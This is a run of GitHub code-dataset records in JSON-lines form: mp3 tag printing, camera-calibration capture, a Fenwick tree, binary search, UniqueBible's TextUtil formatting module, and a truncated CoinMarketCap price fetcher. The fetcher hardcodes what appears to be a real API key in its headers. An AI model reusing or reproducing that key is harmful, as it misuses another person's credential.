{}\".format(tag.recording_date))\n# print(\"Album Type: {}\".format(tag.album_type))\n# print(\"Disc Num: {}\".format(tag.disc_num))\n# print(\"Artist Origin: {}\".format(tag.artist_origin))\n# print(\"# {}\".format('=' * 78))\n# print(\"Artist URL: {}\".format(tag.artist_url))\n# print(\"Audio File URL: {}\".format(tag.audio_file_url))\n# print(\"Audio Source URL: {}\".format(tag.audio_source_url))\n# print(\"Commercial URL: {}\".format(tag.commercial_url))\n# print(\"Copyright URL: {}\".format(tag.copyright_url))\n# print(\"Internet Radio URL: {}\".format(tag.internet_radio_url))\n# print(\"Publisher URL: {}\".format(tag.publisher_url))\n# print(\"Payment URL: {}\".format(tag.payment_url))\n# print(\"# {}\".format('=' * 78))\n# print(\"Publisher: {}\".format(tag.publisher))\n# print(\"Original Release Date: 
{}\".format(tag.original_release_date))\n# print(\"Play Count: {}\".format(tag.play_count))\n# print(\"Tagging Date: {}\".format(tag.tagging_date))\n# print(\"Release Date: {}\".format(tag.release_date))\n# print(\"Terms Of Use: {}\".format(tag.terms_of_use))\n# print(\"isV1: {}\".format(tag.isV1()))\n# print(\"isV2: {}\".format(tag.isV2()))\n# print(\"BPM: {}\".format(tag.bpm))\n# print(\"Cd Id: {}\".format(tag.cd_id))\n# print(\"Composer: {}\".format(tag.composer))\n# print(\"Encoding date: {}\".format(tag.encoding_date))\n# print(\"# {}\".format('=' * 78))\n# if tag.genre is not None : print(\"Genre: {}\".format(tag.genre.name))\n# if tag.non_std_genre is not None : print(\"Non Std Genre Name: {}\".format(tag.non_std_genre.name))\n# if tag.genre is not None : print(\"Genre ID: {}\".format(tag.genre.id))\n# if tag.non_std_genre is not None : print(\"Non Std Genre ID: {}\".format(tag.non_std_genre.id))\n# print(\"LAME Tag: {}\".format(a.info.lame_tag))\n# print(\"# {}\".format('=' * 78))\n# print(\"Header Version: {}\".format(tag.header.version))\n# print(\"Header Major Version: {}\".format(tag.header.major_version))\n# print(\"Header Minor Version: {}\".format(tag.header.minor_version))\n# print(\"Header Rev Version: {}\".format(tag.header.rev_version))\n# print(\"Header Extended: {}\".format(tag.header.extended))\n# print(\"Header Footer: {}\".format(tag.header.footer))\n# print(\"Header Experimental: {}\".format(tag.header.experimental))\n# print(\"Header SIZE: {}\".format(tag.header.SIZE))\n# print(\"Header Tag Size: {}\".format(tag.header.tag_size))\n# print(\"Extended Header Size: {}\".format(tag.extended_header.size))\n# print(\"# {}\".format('=' * 78))\n# print(\"File Name: {}\".format(tag.file_info.name))\n# print(\"File Tag Size: {}\".format(tag.file_info.tag_size))\n# print(\"File Tag Padding Size: {}\".format(tag.file_info.tag_padding_size))\n# print(\"File Read Only: {}\".format(tag.read_only))\n# print(\"File Size: {}\".format(a.info.size_bytes))\n# print(\"Last Modified: {}\".format(time.strftime('%Y-%m-%d %H:%M:%S',\n# time.localtime(tag.file_info.mtime))))\n# print(\"Last Accessed: {}\".format(time.strftime('%Y-%m-%d %H:%M:%S',\n# time.localtime(tag.file_info.atime))))\n# print(\"# {}\".format('=' * 78))\n#\n#\n# def duration_from_seconds(s):\n# \"\"\"Module to get the convert Seconds to a time like format.\"\"\"\n# s = s\n# m, s = divmod(s, 60)\n# h, m = divmod(m, 60)\n# d, h = divmod(h, 24)\n# timelapsed = \"{:01d}:{:02d}:{:02d}:{:02d}\".format(int(d),\n# int(h),\n# int(m),\n# int(s))\n# return timelapsed\n#\n# fileName = \"1.mp3\"\n# filePath = \"{}\\\\1.mp3\".format(pathlib.Path().absolute())\n#\n# track_info(fileName)\n#","repo_name":"freean2468/project_mp3loud","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43628428125","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport cv2\nimport shutil\n\n\nif __name__ == '__main__':\n camera = cv2.VideoCapture(int(sys.argv[1]))\n camera.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\n camera.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\n cv2.namedWindow(\"Frames for calibration\")\n\n if os.path.exists('calibration_res'):\n shutil.rmtree('calibration_res')\n os.makedirs('calibration_res')\n\n snapshot_counter = 0\n print('Press space to capture an image')\n while True:\n ret, frame = camera.read()\n if not ret:\n print(\"Failed to grab frame\")\n break\n\n cv2.imshow(\"Frames for 
calibration\", frame)\n\n k = cv2.waitKey(10)\n if k % 256 == 27:\n break\n elif k % 256 == 32:\n filename = 'calibration_res/calibration_frame_{}.png'.format(\n snapshot_counter)\n cv2.imwrite(filename, frame)\n print('File {} saved.'.format(filename))\n snapshot_counter += 1\n","repo_name":"hibetterheyj/EPFL_ROS_Practicals_Project","sub_path":"src/ros_basics_vision/calibration/capture_calibration_pictures.py","file_name":"capture_calibration_pictures.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31648316688","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nclass fenwick_tree():\n def __init__(self, n:int, mod:int = 0):\n self.__mod = mod\n self.__n = n\n self.__data = [0] * self.__n\n\n def add(self, p:int, x:int):\n assert (0 <= p) & (p < self.__n)\n if(self.__mod == 0):\n self.__add_mod0(p,x)\n else:\n self.__add_mod(p,x)\n\n def __add_mod0(self, p:int, x:int):\n p+=1\n while( p<= self.__n):\n self.__data[p-1] += x\n p += p & -p\n\n def __add_mod(self, p:int, x:int):\n p+=1\n while( p<= self.__n):\n self.__data[p-1] += x\n self.__data[p-1] %= self.__mod\n p += p & -p\n\n def sum(self, l:int, r:int):\n assert (0 <= l) & (l <= r) & (r <= self.__n)\n if(self.__mod == 0):\n return self.__sum_mod0(r) - self.__sum_mod0(l)\n else:\n return self.__sum_mod(r) - self.__sum_mod(l)\n\n def __sum_mod0(self, r:int):\n s = 0\n while(r > 0):\n s += self.__data[r-1]\n r -= r & -r\n return s\n\n def __sum_mod(self, r:int):\n s = 0\n while(r > 0):\n s += self.__data[r-1]\n s %= self.__mod\n r -= r & -r\n return s\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\n\nn,q = map(int,readline().split())\na = list(map(int,readline().split()))\nquery = list(map(int,read().split()))\n\nft = fenwick_tree(n,mod=10**18)\nans = []\n\nfor i,ai in enumerate(a):\n ft.add(i,ai)\n\ni = 0\nfor _ in range(q):\n if(query[i]==0):\n p,x = query[i+1:i+3]\n ft.add(p,x)\n else:\n l,r = query[i+1:i+3]\n ans.append(ft.sum(l,r))\n i += 3\n\nprint('\\n'.join(map(str,ans)))\n","repo_name":"komajun365/competitive_programming","sub_path":"others/practice2_old/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26623654998","text":"#this is another way of implementing binary search in a recursive form\n\n\ndef recursive_binary_search(list, target):\n if len(list) == 0:\n return False\n else:\n midpoint = len(list) // 2\n if list[midpoint] == target:\n return True\n else:\n if target > list[midpoint]:\n return recursive_binary_search(list[midpoint +1 :] , target)\n else:\n return recursive_binary_search(list[:midpoint] , target)\n \n\ndef verify(result):\n if result == True:\n print(f'the target was found... : ) : {result}')\n else:\n print(f'the target was not found... 
: ( : {result}')\n\nrandom_numbers = [12, 45, 67, 23, 56, 78, 34, 89, 10, 42]\nsorted_list = sorted(random_numbers)\n\nfirst_target = 56\nsecond_target = 80\n\nresult = recursive_binary_search(sorted_list, first_target)\nverify(result)\n\nresult = recursive_binary_search(sorted_list, second_target)\nverify(result)","repo_name":"Felix221123/python_projects","sub_path":"recursive_binary_search.py","file_name":"recursive_binary_search.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6405824815","text":"import re, html, base64, os, config\nfrom util.BibleVerseParser import BibleVerseParser\nimport urllib.parse\ntry:\n import html_text\n isHtmlTextInstalled = True\nexcept:\n isHtmlTextInstalled = False\n\ntry:\n from bs4 import BeautifulSoup\n import html5lib\n isBeautifulsoup4Installed = True\nexcept:\n isBeautifulsoup4Installed = False\n\nclass TextUtil:\n\n @staticmethod\n def formatConfigLabel(text):\n text = re.sub(\"([a-z])([A-Z])\", r\"\\1 \\2\", text)\n words = text.split(\" \")\n words[0] = words[0].capitalize()\n return \" \".join(words)\n\n @staticmethod\n def getQueryPrefix():\n return \"PRAGMA case_sensitive_like = {0}; \".format(\"true\" if config.enableCaseSensitiveSearch else \"false\")\n\n @staticmethod\n def regexp(expr, item):\n reg = re.compile(expr, flags=0 if config.enableCaseSensitiveSearch else re.IGNORECASE)\n #return reg.match(item) is not None\n return reg.search(item) is not None\n\n @staticmethod\n def highlightSearchString(text, searchString):\n if searchString == \"z\":\n return text\n if config.enableCaseSensitiveSearch:\n return re.sub(\"({0})\".format(searchString), r\"\\1\", text, flags=0)\n else:\n return re.sub(\"({0})\".format(searchString), r\"\\1\", text, flags=re.IGNORECASE)\n\n @staticmethod\n # a fallback method when Prompt_toolkit formatted text does not work\n def convertHtmlTagToColorama(text):\n \"\"\"\"\n # prompt-toolkit ansi color names\n config.terminalColors = {\n \"ansidefault\": \"ansidefault\",\n \"ansiblack\": \"ansiwhite\",\n \"ansired\": \"ansibrightred\",\n \"ansigreen\": \"ansibrightgreen\",\n \"ansiyellow\": \"ansibrightyellow\",\n \"ansiblue\": \"ansibrightblue\",\n \"ansimagenta\": \"ansibrightmagenta\",\n \"ansicyan\": \"ansibrightcyan\",\n \"ansigray\": \"ansibrightblack\",\n \"ansiwhite\": \"ansiblack\",\n \"ansibrightred\": \"ansired\",\n \"ansibrightgreen\": \"ansigreen\",\n \"ansibrightyellow\": \"ansiyellow\",\n \"ansibrightblue\": \"ansiblue\",\n \"ansibrightmagenta\": \"ansimagenta\",\n \"ansibrightcyan\": \"ansicyan\",\n \"ansibrightblack\": \"ansigray\",\n }\n \"\"\"\n # Reference: https://github.com/tartley/colorama/blob/master/colorama/ansi.py\n # standard colours: \"RESET\", \"BLACK\", \"WHITE\", \"RED\", \"GREEN\", \"YELLOW\", \"BLUE\", \"MAGENTA\", \"CYAN\"\n # extended colours: \"LIGHTBLACK_EX\", \"LIGHTRED_EX\", \"LIGHTGREEN_EX\", \"LIGHTYELLOW_EX\", \"LIGHTBLUE_EX\", \"LIGHTMAGENTA_EX\", \"LIGHTCYAN_EX\", \"LIGHTWHITE_EX\"\n if (\"Colorama\" in config.enabled):\n from colorama import Fore, Back, Style\n\n searchReplace = (\n (\"\", \"\\033[1m\"),\n (\"\", \"\\033[3m\"),\n (\"\", \"\\033[4m\"),\n (\"\", \"\\033[0m\"),\n (\"\", \"\\033[0m\"),\n (\"\", \"\\033[0m\"),\n )\n for search, replace in searchReplace:\n text = text.replace(search, replace)\n\n searchReplace = (\n (\"]+?>\", Fore.RESET),\n (\"|\", Style.RESET_ALL),\n (\"\"\"]*?)\" bg=\"([^<>]*?)\">\"\"\", r\"<\\1> \"),\n\n (\"\", Fore.RESET),\n\n (\"\", 
Fore.BLACK),\n (\"\", Fore.RED),\n (\"\", Fore.GREEN),\n (\"\", Fore.YELLOW),\n (\"\", Fore.BLUE),\n (\"\", Fore.MAGENTA),\n (\"\", Fore.CYAN),\n (\"\", Fore.WHITE),\n (\"\", Fore.WHITE),\n\n (\"\", Fore.LIGHTBLACK_EX),\n (\"\", Fore.LIGHTRED_EX),\n (\"\", Fore.LIGHTGREEN_EX),\n (\"\", Fore.LIGHTYELLOW_EX),\n (\"\", Fore.LIGHTBLUE_EX),\n (\"\", Fore.LIGHTMAGENTA_EX),\n (\"\", Fore.LIGHTCYAN_EX),\n\n (\"\", Back.RESET),\n\n (\"\", Back.BLACK),\n (\"\", Back.RED),\n (\"\", Back.GREEN),\n (\"\", Back.YELLOW),\n (\"\", Back.BLUE),\n (\"\", Back.MAGENTA),\n (\"\", Back.CYAN),\n (\"\", Back.WHITE),\n (\"\", Back.WHITE),\n\n (\"\", Back.LIGHTBLACK_EX),\n (\"\", Back.LIGHTRED_EX),\n (\"\", Back.LIGHTGREEN_EX),\n (\"\", Back.LIGHTYELLOW_EX),\n (\"\", Back.LIGHTBLUE_EX),\n (\"\", Back.LIGHTMAGENTA_EX),\n (\"\", Back.LIGHTCYAN_EX),\n\n (\"<[^<>]*?>\", \"\"),\n )\n for search, replace in searchReplace:\n text = re.sub(search, replace, text)\n else:\n text = re.sub(\"<[^<>]*?>\", \"\", text)\n\n return text\n\n @staticmethod\n def colourTerminalText(text):\n searchReplace = (\n #(\"(|||)\", r\"「{0}」\".format(config.terminalHeadingTextColor)),\n #(\"(||)\", r\"「/{0}」\".format(config.terminalHeadingTextColor)),\n # make sure tags are paired\n (\"()(.*?)()\", r\"\\1「{0}」\\2「/{0}」\\3\".format(config.terminalHeadingTextColor)),\n (\"(||)(.*?)(|)\", r\"\\1「{0}」\\2「/{0}」\\3\".format(config.terminalHeadingTextColor)),\n #(\"(|||||)\", r\"「{0}」\".format(config.terminalResourceLinkColor)),\n #(\"(||)\", r\"「/{0}」\".format(config.terminalResourceLinkColor)),\n (\"(|)(.*?)()\", r\"\\1「{0}」\\2「/{0}」\\3\".format(config.terminalResourceLinkColor)),\n (\"(|)(.*?)()\", r\"\\1「b」「{0}」\\2「/{0}」「/b」\\3\".format(config.terminalResourceLinkColor)),\n (\"(|)(.*?)()\", r\"\\1「{0}」\\2「/{0}」\\3\".format(config.terminalResourceLinkColor)),\n #(\"()\", r\"「{0}」\".format(config.terminalVerseNumberColor)),\n #(\"()\", r\"「/{0}」\".format(config.terminalVerseNumberColor)),\n (\"(|)(.*?)()\", r\"\\1「{0}」\\2「/{0}」\\3\".format(config.terminalResourceLinkColor)),\n #(\"\", \"\"\"「tmsh fg=\"{1}\" bg=\"{0}\"」\"\"\".format(config.terminalSearchHighlightBackground, config.terminalSearchHighlightForeground)),\n #(\"\", \"「/tmsh」\"),\n (\"()(.*?)()\", r\"\"\"\\1「tmsh fg=\"{1}\" bg=\"{0}\"」\\2「/tmsh」\\3\"\"\".format(config.terminalSearchHighlightBackground, config.terminalSearchHighlightForeground)),\n # basic html\n (\"<(b|u|i)>\", r\"「\\1」\"),\n (\"\", r\"「/\\1」\"),\n )\n for search, replace in searchReplace:\n text = re.sub(search, replace, text)\n return text\n\n @staticmethod\n def htmlToPlainText(content, colours=True):\n content = content.replace(\"
<hr>\", \"<br>--------------------<br>\")\n if config.runMode == \"terminal\":\n content = re.sub(r\"\"\"\\1\"\"\", r\"[\\1 ] \", content)\n content = re.sub(\"\"\"(<[^<>]*?onclick=\"luW\\([0-9]+?,')([0-9]+?)('[^<>]*?>)\"\"\", r\"[\\3 ]\\1\\2\\3\\4\", content)\n content = re.sub(\"\"\"(<[^<>]+?\\(')([^<>]+?)('\\)\">)\"\"\", r\"[\\2 ] \", content)\n # Format text colours\n if config.runMode == \"terminal\" and colours:\n content = TextUtil.colourTerminalText(content)\n # convert text\n if isHtmlTextInstalled:\n content = html_text.extract_text(content)\n elif isBeautifulsoup4Installed:\n content = re.sub(\"(</th>|</td>)\", r\"\\1 \", content)\n content = re.sub(\"(<br>|<br/>|</tr>)\", r\"\\1\\n\", content)\n content = re.sub(\"(|||)\", r\"\\1\\n\\n\", content)\n content = BeautifulSoup(content, \"html5lib\").get_text()\n else:\n content = re.sub(\"<br>|<br/>\", \"\\n\", content)\n content = re.sub('<[^<]+?>', '', content)\n if config.runMode == \"terminal\" and not colours:\n content = re.sub(\"\"\"「ansi[^「」]+?」|「tm[a-z][a-z] fg=\\\"[^「」]*?\\\" bg=\\\"[^「」]*?\\\"」|「/tm[a-z][a-z]」\"\"\", \"\", content)\n elif config.runMode == \"terminal\" and colours:\n searchReplace = (\n (\"「ansiblack」\", \"\"),\n (\"「ansired」\", \"\"),\n (\"「ansigreen」\", \"\"),\n (\"「ansiyellow」\", \"\"),\n (\"「ansiblue」\", \"\"),\n (\"「ansimagenta」\", \"\"),\n (\"「ansicyan」\", \"\"),\n (\"「ansigray」\", \"\"),\n (\"「ansiwhite」\", \"\"),\n (\"「ansibrightred」\", \"\"),\n (\"「ansibrightgreen」\", \"\"),\n (\"「ansibrightyellow」\", \"\"),\n (\"「ansibrightblue」\", \"\"),\n (\"「ansibrightmagenta」\", \"\"),\n (\"「ansibrightcyan」\", \"\"),\n (\"「ansibrightblack」\", \"\"),\n (\"「/ansiblack」\", \"\"),\n (\"「/ansired」\", \"
\"),\n (\"「/ansigreen」\", \"\"),\n (\"「/ansiyellow」\", \"\"),\n (\"「/ansiblue」\", \"\"),\n (\"「/ansimagenta」\", \"\"),\n (\"「/ansicyan」\", \"\"),\n (\"「/ansigray」\", \"\"),\n (\"「/ansiwhite」\", \"\"),\n (\"「/ansibrightred」\", \"\"),\n (\"「/ansibrightgreen」\", \"\"),\n (\"「/ansibrightyellow」\", \"\"),\n (\"「/ansibrightblue」\", \"\"),\n (\"「/ansibrightmagenta」\", \"\"),\n (\"「/ansibrightcyan」\", \"\"),\n (\"「/ansibrightblack」\", \"\"),\n (\"\"\"「(tm[a-z][a-z] fg=\"[^「」]*?\" bg=\"[^「」]*?\")」\"\"\", r\"<\\1>\"),\n (\"「(/tm[a-z][a-z])」\", r\"<\\1>\"),\n (\"「(b|u|i)」\", r\"<\\1>\"),\n (\"「/(b|u|i)」\", r\"\"),\n #(\"[ ]*「Fore.RESET」\", Fore.RESET),\n #(\"[ ]*「Back.RESET」\", Back.RESET),\n #(\"[ ]*「Style.RESET_ALL」\", Style.RESET_ALL),\n )\n for search, replace in searchReplace:\n content = re.sub(search, replace, content)\n\n searchReplace = (\n (\" audiotrack\", \"\"),\n (\" [ ]+?([^ ])\", r\" \\1\"),\n )\n for search, replace in searchReplace:\n content = re.sub(search, replace, content)\n # fine tune\n if config.runMode == \"terminal\":\n content = re.sub(r\"\"\"(G[0-9]+?)'\\)\" class=\"G\\1\" onmouseover=\"ld\\('\\1'\\); hl1\\('','','\\1'\\)\" onmouseout=\"hl0\\('','','\\1\"\"\", r\"\\1\", content)\n return content\n\n @staticmethod\n def imageToText(filepath):\n fileBasename = os.path.basename(filepath)\n *_, fileExtension = os.path.splitext(fileBasename)\n if fileExtension.lower() in (\".png\", \".jpg\", \".jpeg\", \".bmp\", \".gif\"):\n # read a binary file\n with open(filepath, \"rb\") as fileObject:\n binaryData = fileObject.read()\n encodedData = base64.b64encode(binaryData)\n binaryString = encodedData.decode(\"ascii\")\n htmlTag = '\"{1}\"'.format(binaryString, fileBasename, fileExtension[1:])\n return htmlTag\n else:\n return \"[File type not supported!]\"\n\n @staticmethod\n def formulateUBACommandHyperlink(text):\n # Create hyperlink to UBA command\n # work on text formatted like ***[CROSSREFERENCE:::John 3:16@An hyperlink link to open cross-references of John 3:16]\n return re.sub(\"\\*\\*\\*\\[([^'{0}]*?)@([^'{0}]*?)\\]\".format('\"\\*\\[\\]@'), r\"\\2\".format('\"'), text)\n\n @staticmethod\n def fixTextHighlighting(text):\n # fix searching LXX / SBLGNT words\n text = re.sub(r\"([LS][0-9]+?)'\\)\"'\"'\">(.*?)\", r\"\\1'\\)\"'\"'r\">\\2\", text)\n # remove misplacement of tags & \n p = re.compile(\"(<[^<>]*?)(.*?)\", flags=re.M)\n s = p.search(text)\n while s:\n text = re.sub(p, r\"\\1\\2\", text)\n s = p.search(text)\n return text\n\n @staticmethod\n def plainTextToUrl(text):\n # https://wiki.python.org/moin/EscapingHtml\n text = html.escape(text)\n searchReplace = (\n (\" \", \"%20\"),\n (\"\\n\", \"%0D%0A\"),\n )\n for search, replace in searchReplace:\n text = text.replace(search, replace)\n return text\n\n # Return digits from a string\n @staticmethod\n def getDigits(text):\n return ''.join(c for c in text if c.isdigit())\n\n # Generate a web link for sharing\n @staticmethod\n def getWeblink(command, server=\"\"):\n # https://stackoverflow.com/questions/40557606/how-to-url-encode-in-python-3\n command = urllib.parse.quote(command)\n htmlPages = {\n \"ENG\": \"index.html\",\n \"TC\": \"traditional.html\",\n \"SC\": \"simplified.html\",\n }\n htmlPage = \"\" if config.webUBAServer.endswith(\".html\") and not server else \"/{0}\".format(htmlPages.get(htmlPages[config.standardAbbreviation], \"index.html\"))\n return \"{0}{1}?cmd={2}\".format(server if server else config.webUBAServer, htmlPage, command)\n\n # Remove Hebrew vowels or Greek accents\n @staticmethod\n def 
removeVowelAccent(text):\n searchReplace = (\n (r\"[\\֑\\֒\\֓\\֔\\֕\\֖\\֗\\֘\\֙\\֚\\֛\\֜\\֝\\֞\\֟\\֠\\֡\\֣\\֤\\֥\\֦\\֧\\֨\\֩\\֪\\֫\\֬\\֭\\֮\\ֽ\\ׄ\\ׅ\\‍\\‪\\‬\\̣\\ְ\\ֱ\\ֲ\\ֳ\\ִ\\ֵ\\ֶ\\ַ\\ָ\\ֹ\\ֺ\\ֻ\\ׂ\\ׁ\\ּ\\ֿ\\־\\׀\\׆]\", \"\"),\n (\"[שׂשׁ]\", \"ש\"),\n (\"[ἀἄᾄἂἆἁἅᾅἃάᾴὰᾶᾷᾳ]\", \"α\"),\n (\"[ἈἌἎἉἍἋ]\", \"Α\"),\n (\"[ἐἔἑἕἓέὲ]\", \"ε\"),\n (\"[ἘἜἙἝἛ]\", \"Ε\"),\n (\"[ἠἤᾔἢἦᾖᾐἡἥἣἧᾗᾑήῄὴῆῇῃ]\", \"η\"),\n (\"[ἨἬἪἮἩἭἫ]\", \"Η\"),\n (\"[ἰἴἶἱἵἳἷίὶῖϊΐῒ]\", \"ι\"),\n (\"[ἸἼἹἽ]\", \"Ι\"),\n (\"[ὀὄὂὁὅὃόὸ]\", \"ο\"),\n (\"[ὈὌὉὍὋ]\", \"Ο\"),\n (\"[ῥ]\", \"ρ\"),\n (\"[Ῥ]\", \"Ρ\"),\n (\"[ὐὔὒὖὑὕὓὗύὺῦϋΰῢ]\", \"υ\"),\n (\"[ὙὝὟ]\", \"Υ\"),\n (\"[ὠὤὢὦᾠὡὥὧᾧώῴὼῶῷῳ]\", \"ω\"),\n (\"[ὨὬὪὮὩὭὯ]\", \"Ω\"),\n )\n for search, replace in searchReplace:\n text = re.sub(search, replace, text)\n return text\n\n # fix note font display\n @staticmethod\n def fixNoteFontDisplay(content):\n if config.overwriteNoteFont:\n content = re.sub(\"font-family:[^<>]*?([;'{0}])\".format('\"'), r\"font-family:{0}\\1\".format(config.font),\n content)\n if config.overwriteNoteFontSize:\n content = re.sub(\"font-size:[^<>]*?;\", \"\", content)\n return content\n\n # fix note font display\n @staticmethod\n def fixNoteFont(note):\n note = re.sub(\"\\n\"\"\", \"\", note)\n return note\n\n # wrap with html\n @staticmethod\n def htmlWrapper(text, parsing=False, view=\"study\", linebreak=True, html=True):\n searchReplace1 = (\n (\"\\r\\n|\\r|\\n\", \"
<br>\"),\n (\"\\t\", \"  \"),\n )\n searchReplace2 = (\n (\"(||)\", r\"\\1\"),\n (\"(||)
\", r\"\\1\"),\n (\"]*?href=['{0}]([^\\n<>]*?)['{0}][^\\n<>]*?>\".format('\"'),\n r\"\".format('\"')),\n (\"onclick='website\\({0}([^\\n<>]*?).uba{0}\\)'\".format('\"'), r\"onclick='uba({0}\\1.uba{0})'\".format('\"'))\n )\n if linebreak:\n for search, replace in searchReplace1:\n text = re.sub(search, replace, text)\n if html:\n for search, replace in searchReplace2:\n text = re.sub(search, replace, text)\n if parsing:\n # Export inline images to external files, so as to improve parsing performance. \n text = TextUtil.exportAllImages(text)\n text = TextUtil.formulateUBACommandHyperlink(text)\n text = BibleVerseParser(config.parserStandarisation).parseText(text)\n if not \"UniqueBible.app\" in text:\n text = TextUtil.wrapHtml(text, view)\n return text\n\n # export images\n @staticmethod\n def exportAllImages(htmlText):\n config.exportImageNumber = 0\n searchPattern = r'src=([\"{0}])data:image/([^<>]+?);[ ]*?base64,[ ]*?([^ <>]+?)\\1'.format(\"'\")\n htmlText = re.sub(searchPattern, TextUtil.exportAnImage, htmlText)\n return htmlText\n\n @staticmethod\n def exportAnImage(match):\n exportFolder = os.path.join(\"htmlResources\", \"images\", \"export\")\n if not os.path.isdir(exportFolder):\n os.makedirs(exportFolder)\n quotationMark, ext, asciiString = match.groups()\n # Note the difference between \"groups\" and \"group\"\n # wholeString = match.group(0)\n # quotationMark = match.group(1)\n # ext = match.group(2)\n # asciiString = match.group(3)\n config.exportImageNumber += 1\n binaryString = asciiString.encode(\"ascii\")\n binaryData = base64.b64decode(binaryString)\n imageFilename = \"tab{0}_image{1}.{2}\".format(100, config.exportImageNumber, ext)\n exportPath = os.path.join(exportFolder, imageFilename)\n with open(exportPath, \"wb\") as fileObject2:\n fileObject2.write(binaryData)\n return \"src={0}images/export/{1}{0}\".format(quotationMark, imageFilename)\n\n # wrap with html 2\n @staticmethod\n def wrapHtml(content, view=\"\", book=False):\n fontFamily = config.font\n fontSize = \"{0}px\".format(config.fontSize)\n if book:\n if config.overwriteBookFontFamily:\n fontFamily = config.overwriteBookFontFamily\n if config.overwriteBookFontSize:\n if type(config.overwriteBookFontSize) == str:\n fontSize = config.overwriteBookFontSize\n elif type(config.overwriteBookFontSize) == int:\n fontSize = \"{0}px\".format(config.overwriteBookFontSize)\n bcv = (config.studyText, config.studyB, config.studyC, config.studyV) if view == \"study\" else (config.mainText, config.mainB, config.mainC, config.mainV)\n activeBCVsettings = \"\".format(*bcv)\n html = (\"\"\"UniqueBible.app\n \n \n \n \n \"\"\"\n \"\"\n \"\"\n \"\"\n \"\"\n \"\"\n \"\"\n \"\"\n \"\"\"\"\"\"\n \"{0}\"\n \"\"\"\"\"\"\n \"\"\n \"{1}\"\n \"
\"\n ).format(activeBCVsettings,\n content,\n \"{\",\n \"}\",\n fontSize,\n fontFamily,\n config.fontChinese,\n config.theme,\n TextUtil.getHighlightCss(),\n config.webUBAIcon,\n config.widgetBackgroundColor,\n config.widgetForegroundColor,\n )\n return html\n\n # get highlight css\n @staticmethod\n def getHighlightCss():\n css = \"\"\n for i in range(len(config.highlightCollections)):\n code = \"hl{0}\".format(i + 1)\n css += \".{2} {0} background: {3}; {1} \".format(\"{\", \"}\", code, config.highlightDarkThemeColours[i] if config.theme == \"dark\" else config.highlightLightThemeColours[i])\n return css\n\n # Remove special characters\n @staticmethod\n def removeSpecialCharacters(text):\n searchReplace = (\n (r\"[\\-\\—\\,\\;\\:\\\\\\?\\.\\·\\·\\‘\\’\\‹\\›\\“\\”\\«\\»\\(\\)\\[\\]\\{\\}\\⧼\\⧽\\〈\\〉\\*\\‿\\᾽\\⇔\\¦]\", \"\"),\n )\n for search, replace in searchReplace:\n text = re.sub(search, replace, text)\n return text\n\n\nif __name__ == '__main__':\n\n print(TextUtil.getDigits(\"abc123def\"))\n","repo_name":"eliranwong/UniqueBible","sub_path":"util/TextUtil.py","file_name":"TextUtil.py","file_ext":"py","file_size_in_byte":23927,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"13411986199","text":"from requests import Session\nimport json\n\n# This is a test\n# This is another test line\n\nquotes_latest_url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/quotes/latest' # The URL to the Coin Market Cap latest quotes database\n\nheaders = {\n \"Accepts\": \"application/json\",\n \"X-CMC_PRO_API_KEY\": \"099b0231-cdb1-482b-8921-4b95af9590fa\"\n}\n\nsession = Session()\nsession.headers.update(headers)\n\ncryptoID = {'btc': '1', 'eth': '1027', 'ada': '2010', 'xrp': '52', 'ltc': '2', 'xlm': '512', 'bnb': '1839', 'doge': '74', 'usdt': '825'} # Contains each crypto name ID paired with their id within the API\ndataNames = [\"last_updated\", \"market_cap\", \"percent_change_1h\", \"percent_change_24h\", \"percent_change_7d\", \"percent_change_30d\", \"percent_change_60d\", \"percent_change_90d\", \"volume_24h\", \"price\"] # List of all the supported types of data that the user can access about a particular crypto\n\n# General Description\n# Gets the price data of crypto currencies supported by the \"Coin Market Cap API\"\n#\n# Parameters\n# (type) crypto type such as \"btc\", \"eth\", \"ada\", etc\n# (data_name) the data in which the user wants, such as \"price\", \"last_updated\", \"percent_change_1h\", etc\n#\ndef getLatestData(type, data_name):\n data_name = data_name.lower()\n type = type.lower()\n crypto_param = get_param(type) # Assigns a dictionary of the corresponding crypto and currency type4\n\n response = session.get(quotes_latest_url, params=crypto_param)\n\n # Checks if the data_name variable is a correct type of data supported by the API\n #if data_name not in dataNames:\n #print(\"Incorrect data type \\\"{}\\\". 
\\nUsage: \".format(data_name), end=\" \")\n #for name in dataNames:\n #print(\"\\\"{}\\\"\".format(name), end=\" \")\n #return -1\n \n if data_name not in dataNames:\n return -1\n if type not in cryptoID:\n return -2\n\n for name in dataNames:\n if data_name == name:\n return json.loads(response.text)['data'][cryptoID[type]]['quote']['USD'][name] # Pulls the desired information from the json data supplied by the API\n\n\ndef listSupportedCryptoCurrencies():\n myList = []\n for id in cryptoID:\n myList.append(id)\n return myList\n\n\n# General Description\n# Returns the correct dictionary corresponding to the type provided.\n#\n# Parameter\n# (Type) A string that is the symbol of the corresponding crypto currency I.E 'btc', 'eth', 'ada' , etc\ndef get_param(type):\n if type == 'btc':\n btc_param = {\n \"slug\": \"bitcoin\",\n \"convert\": \"USD\"\n }\n return btc_param\n elif type == 'eth':\n eth_param = {\n \"slug\": \"ethereum\",\n \"convert\": \"USD\"\n }\n return eth_param\n 